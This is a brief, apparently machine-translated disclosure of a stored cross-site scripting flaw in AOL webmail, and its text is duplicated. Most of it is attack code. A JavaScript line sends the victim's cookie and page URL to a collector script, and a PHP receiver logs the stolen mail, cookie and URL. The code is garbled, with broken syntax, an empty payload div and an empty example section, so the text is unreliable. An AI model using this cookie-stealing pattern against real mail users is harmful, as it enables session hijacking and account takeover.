US online mail text storage type xss can be played blindly (first in various skills)
The US online mail body storage type xss can be played blindly! A variety of cool first! Affected Version ie6-10
Xss code:
<div style="display:none"></div>
Email receiving code:
<? Phpecho "new Image (). src = 'HTTP: // 127.0.0.1/aol. php? Mail?aol&cookie='{escape(document.cookie={'&url}'{escape(top.doc ument. location. href); "comment ', $ mail. "\ r \ n ". $ cookie. "\ r \ n ". $ url); function get ($ get) {// get escape function $ val =! Empty ($ _ GET [$ get])? $ _ GET [$ get]: null; return $ val ;}?>
Example:
Xss:
The US online mail body storage type xss can be played blindly! A variety of cool first! Affected Version ie6-10
Xss code:
<div style="display:none"></div>
Email receiving code:
<? Phpecho "new Image (). src = 'HTTP: // 127.0.0.1/aol. php? Mail?aol&cookie='{escape(document.cookie={'&url}'{escape(top.doc ument. location. href); "comment ', $ mail. "\ r \ n ". $ cookie. "\ r \ n ". $ url); function get ($ get) {// get escape function $ val =! Empty ($ _ GET [$ get])? $ _ GET [$ get]: null; return $ val ;}?>
Example:
Xss:
Solution:
Various Filters